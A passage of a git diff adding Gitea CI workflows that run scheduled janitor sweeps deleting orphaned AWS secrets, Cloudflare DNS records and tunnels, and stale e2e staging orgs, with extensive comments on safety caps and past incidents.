post-redeploy. Likely benign teardown race — CP healthz monitor catches real outages." + fi + + # Belt-and-suspenders sanity floor: if MORE than half the fleet is + # unreachable AND the fleet is large enough that "half down" is + # statistically meaningful, this is a real outage (e.g. new image + # crashes on startup), not a teardown race. Hard-fail. + # + # Floor only applies when TOTAL_VERIFIED >= 4 — below that, the + # canary-verify step is the actual gate for "all tenants down" + # detection (it runs against the canary first and aborts the + # rollout if the canary fails to come up). Without the >=4 gate, + # a 1-tenant fleet (e.g. a single ephemeral e2e-* tenant on a + # quiet staging push) would re-flake on the exact teardown-race + # condition #2402 fixed: 1 of 1 unreachable = 100% > 50% → fail. + TOTAL_VERIFIED=${#SLUGS[@]} + if [ $TOTAL_VERIFIED -ge 4 ] && [ $UNREACHABLE_COUNT -gt $((TOTAL_VERIFIED / 2)) ]; then + echo "::error::$UNREACHABLE_COUNT of $TOTAL_VERIFIED staging tenant(s) unreachable — exceeds 50% threshold on a fleet large enough that this signals a real outage, not teardown race." + exit 1 + fi + + if [ $STALE_COUNT -gt 0 ]; then + echo "::error::$STALE_COUNT staging tenant(s) returned a stale SHA. ssm_status=Success was misleading — see job summary." + exit 1 + fi + + echo "::notice::Staging tenant fleet redeploy complete — all reachable tenants on ${EXPECTED_SHA:0:7} (${UNREACHABLE_COUNT} unreachable, soft-warned)." 
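+# Footnote (illustrative only, never executed): the ephemeral-prefix filter in
+# the Call step classifies failed slugs like this; demo-prep is the kind of
+# non-ephemeral failure that must keep hard-failing:
+#
+#   printf 'e2e-canvas-3\nrt-e2e-17\ndemo-prep\n' | grep -Ev '^(e2e-|rt-e2e-)'
+#   # -> demo-prep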
diff --git a/.gitea/workflows/sweep-aws-secrets.yml b/.gitea/workflows/sweep-aws-secrets.yml new file mode 100644 index 00000000..afa8f6fa --- /dev/null +++ b/.gitea/workflows/sweep-aws-secrets.yml @@ -0,0 +1,129 @@ +name: Sweep stale AWS Secrets Manager secrets + +# Ported from .github/workflows/sweep-aws-secrets.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for per-tenant AWS Secrets Manager secrets +# (`molecule/tenant//bootstrap`) whose backing tenant no +# longer exists. Parallel-shape to sweep-cf-tunnels.yml and +# sweep-cf-orphans.yml — different cloud, same justification. +# +# Why this exists separately from a long-term reconciler integration: +# - molecule-controlplane's tenant_resources audit table (mig 024) +# currently tracks four resource kinds: CloudflareTunnel, +# CloudflareDNS, EC2Instance, SecurityGroup. SecretsManager is +# not in the list, so the existing reconciler doesn't catch +# orphan secrets. +# - At ~$0.40/secret/month the cost grew to ~$19/month before this +# sweeper was written, indicating ~45+ orphan secrets from +# crashed provisions and incomplete deprovision flows. +# - The proper fix (KindSecretsManagerSecret + recorder hook + +# reconciler enumerator) is filed as a separate controlplane +# issue. This sweeper is the immediate cost-relief stopgap. +# +# IAM principal: AWS_JANITOR_ACCESS_KEY_ID / AWS_JANITOR_SECRET_ACCESS_KEY. +# This is a DEDICATED principal — the production `molecule-cp` IAM +# user lacks `secretsmanager:ListSecrets` (it only has +# Get/Create/Update/Delete on specific resources, scoped to its +# operational needs). The janitor needs ListSecrets across the +# `molecule/tenant/*` prefix, which warrants a separate principal so +# we don't broaden the prod-CP policy. +# +# Safety: the script's MAX_DELETE_PCT gate (default 50%, mirroring +# sweep-cf-orphans.yml — tenant secrets are durable by design, unlike +# the mostly-orphan tunnels) refuses to nuke past the threshold. + +on: + schedule: + # Hourly at :30 — offsets from sweep-cf-orphans (:15) and + # sweep-cf-tunnels (:45) so the three janitors don't burst the + # CP admin endpoints at the same minute. + - cron: '30 * * * *' +# Don't let two sweeps race the same AWS account. +concurrency: + group: sweep-aws-secrets + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep AWS Secrets Manager + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 30 min cap, mirroring the other janitors. AWS DeleteSecret is + # fast (~0.3s/call) so even a 100+ backlog drains in seconds + # under the 8-way xargs parallelism, but the cap is set generously + # to leave headroom for any actual API hang. 
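+    # Illustrative shape of the 8-way parallel delete referenced above; the
+    # real logic lives in scripts/ops/sweep-aws-secrets.sh, and orphans.txt
+    # (one secret ARN per line) is hypothetical:
+    #
+    #   xargs -P 8 -I{} \
+    #     aws secretsmanager delete-secret --secret-id {} \
+    #       --recovery-window-in-days 7 < orphans.txt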
+ timeout-minutes: 30 + env: + AWS_REGION: ${{ secrets.AWS_REGION || 'us-east-1' }} + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_JANITOR_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_JANITOR_SECRET_ACCESS_KEY }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '50' }} + GRACE_HOURS: ${{ github.event.inputs.grace_hours || '24' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split mirrors sweep-cf-orphans + # and sweep-cf-tunnels (hardened 2026-04-28). Same principle: + # - schedule → exit 1 on missing secrets (red CI surfaces it) + # - workflow_dispatch → exit 0 with warning (operator-driven, + # they already accepted the repo state) + run: | + missing=() + for var in AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "::warning::AWS_JANITOR_* must belong to a principal with secretsmanager:ListSecrets and secretsmanager:DeleteSecret on molecule/tenant/* (the prod molecule-cp principal lacks ListSecrets)." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::AWS_JANITOR_* must belong to a principal with secretsmanager:ListSecrets and secretsmanager:DeleteSecret on molecule/tenant/*." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry mirrors sweep-cf-tunnels: + # - Scheduled: input empty → "false" → --execute (the whole + # point of an hourly janitor). + # - Manual workflow_dispatch: input default true → dry-run; + # operator must flip it to actually delete. + run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-aws-secrets.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-aws-secrets.sh --execute + fi diff --git a/.gitea/workflows/sweep-cf-orphans.yml b/.gitea/workflows/sweep-cf-orphans.yml new file mode 100644 index 00000000..18dc41cb --- /dev/null +++ b/.gitea/workflows/sweep-cf-orphans.yml @@ -0,0 +1,151 @@ +name: Sweep stale Cloudflare DNS records + +# Ported from .github/workflows/sweep-cf-orphans.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). 
+# + +# Janitor for Cloudflare DNS records whose backing tenant/workspace no +# longer exists. Without this loop, every short-lived E2E or canary +# leaves a CF record on the moleculesai.app zone — the zone has a +# 200-record quota (controlplane#239 hit it 2026-04-23+) and provisions +# start failing with code 81045 once exhausted. +# +# Why a separate workflow vs sweep-stale-e2e-orgs.yml: +# - That workflow operates at the CP layer (DELETE /cp/admin/tenants/:slug +# drives the cascade). It assumes CP has the org row to drive the +# deprovision from. It doesn't catch records left behind when CP +# itself never knew about the tenant (canary scratch, manual ops +# experiments) or when the cascade's CF-delete branch failed. +# - sweep-cf-orphans.sh enumerates the CF zone directly and matches +# each record against live CP slugs + AWS EC2 names. It catches +# leaks the CP-driven sweep can't. +# +# Safety: the script's own MAX_DELETE_PCT gate refuses to nuke more +# than 50% of records in a single run. If something has gone weird +# (CP admin endpoint returns no orgs → every tenant looks orphan) the +# gate halts before damage. Decision-function unit tests in +# scripts/ops/test_sweep_cf_decide.py (#2027) cover the rule +# classifier. + +on: + schedule: + # Hourly. Mirrors sweep-stale-e2e-orgs cadence so the two janitors + # converge on the same tick. CF API rate budget is generous (1200 + # req/5min); a single sweep makes ~1 list + N deletes (N<=quota/2). + - cron: '15 * * * *' # offset from sweep-stale-e2e-orgs (top of hour) + # No `merge_group:` trigger on purpose. This is a janitor — it doesn't + # need to gate merges, and including it as written before #2088 fired + # the full sweep job (or its secret-check) on every PR going through + # the merge queue, generating one red CI run per merge-queue eval. If + # this workflow is ever wired up as a required check, re-add + # merge_group: { types: [checks_requested] } + # AND gate the sweep step with `if: github.event_name != 'merge_group'` + # so merge-queue evals report success without actually running. + +# Don't let two sweeps race the same zone. workflow_dispatch during a +# scheduled run would otherwise issue duplicate DELETE calls. +concurrency: + group: sweep-cf-orphans + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep CF orphans + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 3 min surfaces hangs (CF API stall, AWS describe-instances stuck) + # within one cron interval instead of burning a full tick. Realistic + # worst case is ~2 min: 4 sequential curls + 1 aws + N×CF-DELETE + # each individually capped at 10s by the script's curl -m flag. 
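+    #
+    # Rough sketch of the classification pass described in the header
+    # comment. Hedged illustration only: the real rule set lives in
+    # scripts/ops/sweep-cf-orphans.sh and test_sweep_cf_decide.py, and
+    # CP_PROD_URL, jq, the zone-suffix strip, and the skipped
+    # pagination / EC2 cross-check are assumptions made for brevity.
+    #
+    #   curl -s -H "Authorization: Bearer $CF_API_TOKEN" \
+    #     "https://api.cloudflare.com/client/v4/zones/$CF_ZONE_ID/dns_records" \
+    #     | jq -r '.result[].name' | sed 's/\.moleculesai\.app$//' | sort -u > cf_names.txt
+    #   curl -s -H "Authorization: Bearer $CP_PROD_ADMIN_TOKEN" \
+    #     "$CP_PROD_URL/cp/admin/orgs?limit=500" \
+    #     | jq -r '.orgs[].slug' | sort -u > live_slugs.txt
+    #   comm -23 cf_names.txt live_slugs.txt > candidates.txt   # no live org -> candidate
+    #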
+ timeout-minutes: 3 + env: + CF_API_TOKEN: ${{ secrets.CF_API_TOKEN }} + CF_ZONE_ID: ${{ secrets.CF_ZONE_ID }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + AWS_DEFAULT_REGION: us-east-2 + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '50' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split (hardened 2026-04-28 + # after the silent-no-op incident below): + # + # The earlier soft-skip-on-schedule policy hid a real leak. All + # six secrets were unset on this repo for an unknown duration; + # every hourly run printed a yellow ::warning:: and exited 0, + # so the workflow registered as "passing" while doing nothing. + # CF orphans accumulated to 152/200 (~76% of the zone quota + # gone) before a manual `dig`-driven audit caught it. Anything + # that runs as a janitor and reports green while idle is + # indistinguishable from "the janitor is healthy" — so we now + # treat schedule (and any future workflow_run/push triggers) + # as a hard-fail when secrets are missing. + # + # - schedule / workflow_run / push → exit 1 (red CI run + # surfaces the misconfiguration the next tick) + # - workflow_dispatch → exit 0 with a warning + # (an operator ran this ad-hoc; they already accepted the + # state of the repo and want the workflow to short-circuit + # so they can rerun after fixing the secret) + run: | + missing=() + for var in CF_API_TOKEN CF_ZONE_ID CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::a silent skip masked an active CF DNS leak (152/200 zone records) caught only by a manual audit on 2026-04-28; this gate exists to make the gap visible." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry (intentional): + # - Scheduled runs: github.event.inputs.dry_run is empty → + # defaults to "false" below → script runs with --execute + # (the whole point of an hourly janitor). + # - Manual workflow_dispatch: input default is true (line 38) + # so an ad-hoc operator-triggered run is dry-run by default; + # they have to flip the toggle to actually delete. + # The script's MAX_DELETE_PCT gate (default 50%) is the second + # line of defense regardless of mode. 
+ run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-cf-orphans.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-cf-orphans.sh --execute + fi diff --git a/.gitea/workflows/sweep-cf-tunnels.yml b/.gitea/workflows/sweep-cf-tunnels.yml new file mode 100644 index 00000000..3fdc06c1 --- /dev/null +++ b/.gitea/workflows/sweep-cf-tunnels.yml @@ -0,0 +1,128 @@ +name: Sweep stale Cloudflare Tunnels + +# Ported from .github/workflows/sweep-cf-tunnels.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for Cloudflare Tunnels whose backing tenant no longer +# exists. Parallel-shape to sweep-cf-orphans.yml (which sweeps DNS +# records); same justification, different CF resource. +# +# Why this exists separately from sweep-cf-orphans: +# - DNS records live on the zone (`/zones//dns_records`). +# - Tunnels live on the account (`/accounts//cfd_tunnel`). +# - Different CF API surface, different scopes; the existing CF +# token might not have `account:cloudflare_tunnel:edit`. Splitting +# the workflows keeps each one's secret-presence gate independent +# so neither silent-skips when the other's secret is missing. +# - Cleaner blast radius — operators can disable one without the +# other if a regression surfaces. +# +# Safety: the script's MAX_DELETE_PCT gate (default 90% — higher than +# the DNS sweep's 50% because tenant-shaped tunnels are mostly +# orphans by design) refuses to nuke past the threshold. + +on: + schedule: + # Hourly at :45 — offset from sweep-cf-orphans (:15) so the two + # janitors don't issue parallel CF API bursts at the same minute. + - cron: '45 * * * *' +# Don't let two sweeps race the same account. +concurrency: + group: sweep-cf-tunnels + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + sweep: + name: Sweep CF tunnels + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # 30 min cap. Was 5 min on the theory that the only thing that + # could take >5min is a CF-API hang — but on 2026-05-02 a backlog + # of 672 stale tunnels accumulated (large staging E2E run + delayed + # sweep) and the serial `curl -X DELETE` loop (~0.7s/tunnel) needed + # ~7-8min to drain. The 5-min cap killed the run mid-sweep + # (cancelled at 424/672, see run 25248788312); a manual rerun + # finished the remainder fine. + # + # The fix is two-part: parallelize the delete loop (8-way xargs in + # the script — see scripts/ops/sweep-cf-tunnels.sh), AND raise the + # cap so a one-off backlog doesn't trip a hangs-detector that + # turned out to be a real-job-too-slow detector. With 8-way + # parallelism, 600+ tunnels drains in ~60s; 30 min is generous + # headroom for actual hangs to still surface (and is in line with + # the sweep-cf-orphans companion job). 
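+    #
+    # Shape of the parallel delete loop, as a hedged sketch only. The
+    # real implementation lives in scripts/ops/sweep-cf-tunnels.sh;
+    # the tunnel-ID filename and per-call timeout are illustrative
+    # assumptions.
+    #
+    #   # orphan_tunnel_ids.txt: one tunnel UUID per line (list/match phase)
+    #   xargs -P 8 -I{} \
+    #     curl -sS -m 10 -X DELETE \
+    #       "https://api.cloudflare.com/client/v4/accounts/$CF_ACCOUNT_ID/cfd_tunnel/{}" \
+    #       -H "Authorization: Bearer $CF_API_TOKEN" \
+    #     < orphan_tunnel_ids.txt
+    #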
+ timeout-minutes: 30 + env: + CF_API_TOKEN: ${{ secrets.CF_API_TOKEN }} + CF_ACCOUNT_ID: ${{ secrets.CF_ACCOUNT_ID }} + CP_PROD_ADMIN_TOKEN: ${{ secrets.CP_PROD_ADMIN_TOKEN }} + CP_STAGING_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_TOKEN }} + MAX_DELETE_PCT: ${{ github.event.inputs.max_delete_pct || '90' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + id: verify + # Schedule-vs-dispatch behaviour split mirrors sweep-cf-orphans + # (hardened 2026-04-28 after the silent-no-op incident: the + # janitor reported green while doing nothing because secrets + # were unset, masking a 152/200 zone-record leak). Same + # principle applies here: + # - schedule → exit 1 on missing secrets (red CI surfaces it) + # - workflow_dispatch → exit 0 with warning (operator-driven, + # they already accepted the repo state) + run: | + missing=() + for var in CF_API_TOKEN CF_ACCOUNT_ID CP_PROD_ADMIN_TOKEN CP_STAGING_ADMIN_TOKEN; do + if [ -z "${!var:-}" ]; then + missing+=("$var") + fi + done + if [ ${#missing[@]} -gt 0 ]; then + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "::warning::skipping sweep — secrets not configured: ${missing[*]}" + echo "::warning::set them at Settings → Secrets and Variables → Actions, then rerun." + echo "::warning::CF_API_TOKEN must include account:cloudflare_tunnel:edit scope (separate from the zone:dns:edit scope used by sweep-cf-orphans)." + echo "skip=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + echo "::error::sweep cannot run — required secrets missing: ${missing[*]}" + echo "::error::set them at Settings → Secrets and Variables → Actions, or disable this workflow." + echo "::error::CF_API_TOKEN must include account:cloudflare_tunnel:edit scope." + exit 1 + fi + echo "All required secrets present ✓" + echo "skip=false" >> "$GITHUB_OUTPUT" + + - name: Run sweep + if: steps.verify.outputs.skip != 'true' + # Schedule-vs-dispatch dry-run asymmetry mirrors sweep-cf-orphans: + # - Scheduled: input empty → "false" → --execute (the whole + # point of an hourly janitor). + # - Manual workflow_dispatch: input default true → dry-run; + # operator must flip it to actually delete. + run: | + set -euo pipefail + if [ "${{ github.event.inputs.dry_run || 'false' }}" = "true" ]; then + echo "Running in dry-run mode — no deletions" + bash scripts/ops/sweep-cf-tunnels.sh + else + echo "Running with --execute — will delete identified orphans" + bash scripts/ops/sweep-cf-tunnels.sh --execute + fi diff --git a/.gitea/workflows/sweep-stale-e2e-orgs.yml b/.gitea/workflows/sweep-stale-e2e-orgs.yml new file mode 100644 index 00000000..33ac28e5 --- /dev/null +++ b/.gitea/workflows/sweep-stale-e2e-orgs.yml @@ -0,0 +1,243 @@ +name: Sweep stale e2e-* orgs (staging) + +# Ported from .github/workflows/sweep-stale-e2e-orgs.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Janitor for staging tenants left behind when E2E cleanup didn't run: +# CI cancellations, runner crashes, transient AWS errors mid-cascade, +# bash trap missed (signal 9), etc. 
Without this loop, every failed
+# teardown leaks an EC2 + DNS + DB row until manual ops cleanup —
+# 2026-04-23 staging hit the 64 vCPU AWS quota from ~27 such orphans.
+#
+# Why not rely on per-test-run teardown:
+# - Per-run teardown is best-effort by definition. Any process death
+#   after the test starts but before the trap fires leaves debris.
+# - GH Actions cancellation kills the runner without grace period.
+#   The workflow's `if: always()` step usually catches this, but it
+#   too can fail (CP transient 5xx, runner network issue at the
+#   wrong moment).
+# - Even when teardown runs, the CP cascade is best-effort in places
+#   (cascadeTerminateWorkspaces logs+continues; DNS deletion same).
+# - This sweep is the catch-all that converges staging back to clean
+#   regardless of which specific path leaked.
+#
+# The PROPER fix is making CP cleanup transactional + verify-after-
+# terminate (filed separately as cleanup-correctness work). This
+# workflow is the safety net that catches everything else AND any
+# future leak source we haven't yet identified.
+
+on:
+  schedule:
+    # Every 15 min. E2E orgs are short-lived (~8-25 min wall clock from
+    # create to teardown — canary is ~8 min, full SaaS ~25 min). The
+    # previous hourly + 120-min stale threshold meant a leaked tenant
+    # could keep an EC2 alive for up to 2 hours, eating ~2 vCPU per
+    # leak. Tightening the cadence + threshold reduces the worst-case
+    # leak window from 120 min to ~45 min (15-min sweep cadence + 30-min
+    # threshold) without risk of catching in-progress runs (the longest
+    # e2e run is the ~25-min full SaaS run, still under the 30-min
+    # threshold). See molecule-controlplane#420 for the leak-class
+    # accounting that motivated this tightening.
+    - cron: '*/15 * * * *'
+# Don't let two sweeps fight. Cron + workflow_dispatch could overlap
+# on a manual trigger; queue rather than parallel-delete.
+concurrency:
+  group: sweep-stale-e2e-orgs
+  cancel-in-progress: false
+
+permissions:
+  contents: read
+
+env:
+  GITHUB_SERVER_URL: https://git.moleculesai.app
+
+jobs:
+  sweep:
+    name: Sweep e2e orgs
+    runs-on: ubuntu-latest
+    # Phase 3 (RFC #219 §1): surface broken workflows without blocking.
+    continue-on-error: true
+    timeout-minutes: 15
+    env:
+      MOLECULE_CP_URL: https://staging-api.moleculesai.app
+      ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }}
+      MAX_AGE_MINUTES: ${{ github.event.inputs.max_age_minutes || '30' }}
+      DRY_RUN: ${{ github.event.inputs.dry_run || 'false' }}
+      # Refuse to delete more than this many orgs in one tick. If the
+      # CP DB is briefly empty (or the admin endpoint goes weird and
+      # returns no created_at), every e2e- org would look stale.
+      # Bailing protects against runaway nukes.
+      SAFETY_CAP: 50
+
+    steps:
+      - name: Verify admin token present
+        run: |
+          if [ -z "$ADMIN_TOKEN" ]; then
+            echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set"
+            exit 2
+          fi
+          echo "Admin token present ✓"
+
+      - name: Identify stale e2e orgs
+        id: identify
+        run: |
+          set -euo pipefail
+          # Fetch into a file that the python step opens directly —
+          # cleaner than embedding $(curl ...) inside a heredoc.
+          curl -sS --fail-with-body --max-time 30 \
+            "$MOLECULE_CP_URL/cp/admin/orgs?limit=500" \
+            -H "Authorization: Bearer $ADMIN_TOKEN" \
+            > orgs.json
+
+          # Filter:
+          #   1. slug starts with one of the ephemeral test prefixes:
+          #      - 'e2e-'    — covers e2e-canary-, e2e-canvas-*, etc.
+ # - 'rt-e2e-' — runtime-test harness fixtures (RFC #2251); + # missing this prefix left two such tenants + # orphaned 8h on staging (2026-05-03), then + # hard-failed redeploy-tenants-on-staging + # and broke the staging→main auto-promote + # chain. Kept in sync with the EPHEMERAL_PREFIX_RE + # regex in redeploy-tenants-on-staging.yml. + # 2. created_at is older than MAX_AGE_MINUTES ago + # Output one slug per line to a file the next step reads. + python3 > stale_slugs.txt <<'PY' + import json, os + from datetime import datetime, timezone, timedelta + # SSOT for this list lives in the controlplane Go code: + # molecule-controlplane/internal/slugs/ephemeral.go + # (var EphemeralPrefixes). The redeploy-fleet auto-rollout + # also reads from there to SKIP these slugs — without that + # filter, fleet redeploy SSM-failed in-flight E2E tenants + # whose containers were still booting, breaking the test + # that just spun them up (molecule-controlplane#493). + # Update both files together. + EPHEMERAL_PREFIXES = ("e2e-", "rt-e2e-") + with open("orgs.json") as f: + data = json.load(f) + max_age = int(os.environ["MAX_AGE_MINUTES"]) + cutoff = datetime.now(timezone.utc) - timedelta(minutes=max_age) + for o in data.get("orgs", []): + slug = o.get("slug", "") + if not slug.startswith(EPHEMERAL_PREFIXES): + continue + created = o.get("created_at") + if not created: + # Defensively skip rows without created_at — better + # to leave one orphan than nuke a brand-new row + # whose timestamp didn't render. + continue + # Python 3.11+ handles RFC3339 with Z directly via + # fromisoformat; older runners need the trailing Z swap. + created_dt = datetime.fromisoformat(created.replace("Z", "+00:00")) + if created_dt < cutoff: + print(slug) + PY + + count=$(wc -l < stale_slugs.txt | tr -d ' ') + echo "Found $count stale e2e org(s) older than ${MAX_AGE_MINUTES}m" + if [ "$count" -gt 0 ]; then + echo "First 20:" + head -20 stale_slugs.txt | sed 's/^/ /' + fi + echo "count=$count" >> "$GITHUB_OUTPUT" + + - name: Safety gate + if: steps.identify.outputs.count != '0' + run: | + count="${{ steps.identify.outputs.count }}" + if [ "$count" -gt "$SAFETY_CAP" ]; then + echo "::error::Refusing to delete $count orgs in one sweep (cap=$SAFETY_CAP). Investigate manually — this usually means the CP admin API returned no created_at or returned a degraded result. Re-run with workflow_dispatch + max_age_minutes if intentional." + exit 1 + fi + echo "Within safety cap ($count ≤ $SAFETY_CAP) ✓" + + - name: Delete stale orgs + if: steps.identify.outputs.count != '0' && env.DRY_RUN != 'true' + run: | + set -uo pipefail + deleted=0 + failed=0 + while IFS= read -r slug; do + [ -z "$slug" ] && continue + # The DELETE handler requires {"confirm": ""} matching + # the URL slug — fat-finger guard. Idempotent: re-issuing + # picks up via org_purges.last_step. + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/del_resp -w "%{http_code}" \ + --max-time 60 \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/del_code + set -e + # Stderr from curl (-sS shows dial errors etc.) goes to runner log. 
+ http_code=$(cat /tmp/del_code 2>/dev/null || echo "000") + if [ "$http_code" = "200" ] || [ "$http_code" = "204" ]; then + deleted=$((deleted+1)) + echo " deleted: $slug" + else + failed=$((failed+1)) + echo " FAILED ($http_code): $slug — $(cat /tmp/del_resp 2>/dev/null | head -c 200)" + fi + done < stale_slugs.txt + echo "" + echo "Sweep summary: deleted=$deleted failed=$failed" + # Don't fail the workflow on per-org delete errors — the + # sweeper is best-effort. Next hourly tick re-attempts. We + # only fail loud at the safety-cap gate above. + + - name: Sweep orphan tunnels + # Stale-org cleanup deletes the org (which cascades to tunnel + # delete inside the CP). But when that cascade fails partway — + # CP transient 5xx after the org row is deleted but before the + # CF tunnel delete completes — the tunnel persists with no + # matching org row. The reconciler in internal/sweep flags this + # as `cf_tunnel kind=orphan`, but nothing automatically reaps it. + # + # `/cp/admin/orphan-tunnels/cleanup` is the operator-triggered + # reaper. Calling it here at the end of every sweep tick + # converges the staging CF account to clean even when CP + # cascades half-fail. + # + # PR #492 made the underlying DeleteTunnel actually check + # status — pre-fix it silent-succeeded on CF code 1022 + # ("active connections"), so this step would have been a no-op + # against stuck connectors. Post-fix the cleanup invokes + # CleanupTunnelConnections + retry, which actually clears the + # 1022 case. (#2987) + # + # Best-effort. Failure here doesn't fail the workflow — next + # tick re-attempts. Errors flow to step output for ops review. + if: env.DRY_RUN != 'true' + run: | + set +e + curl -sS -o /tmp/cleanup_resp -w "%{http_code}" \ + --max-time 60 \ + -X POST "$MOLECULE_CP_URL/cp/admin/orphan-tunnels/cleanup" \ + -H "Authorization: Bearer $ADMIN_TOKEN" >/tmp/cleanup_code + set -e + http_code=$(cat /tmp/cleanup_code 2>/dev/null || echo "000") + body=$(cat /tmp/cleanup_resp 2>/dev/null | head -c 500) + if [ "$http_code" = "200" ]; then + count=$(echo "$body" | python3 -c "import sys,json; d=json.loads(sys.stdin.read() or '{}'); print(d.get('deleted_count', 0))" 2>/dev/null || echo "0") + failed_n=$(echo "$body" | python3 -c "import sys,json; d=json.loads(sys.stdin.read() or '{}'); print(len(d.get('failed') or {}))" 2>/dev/null || echo "0") + echo 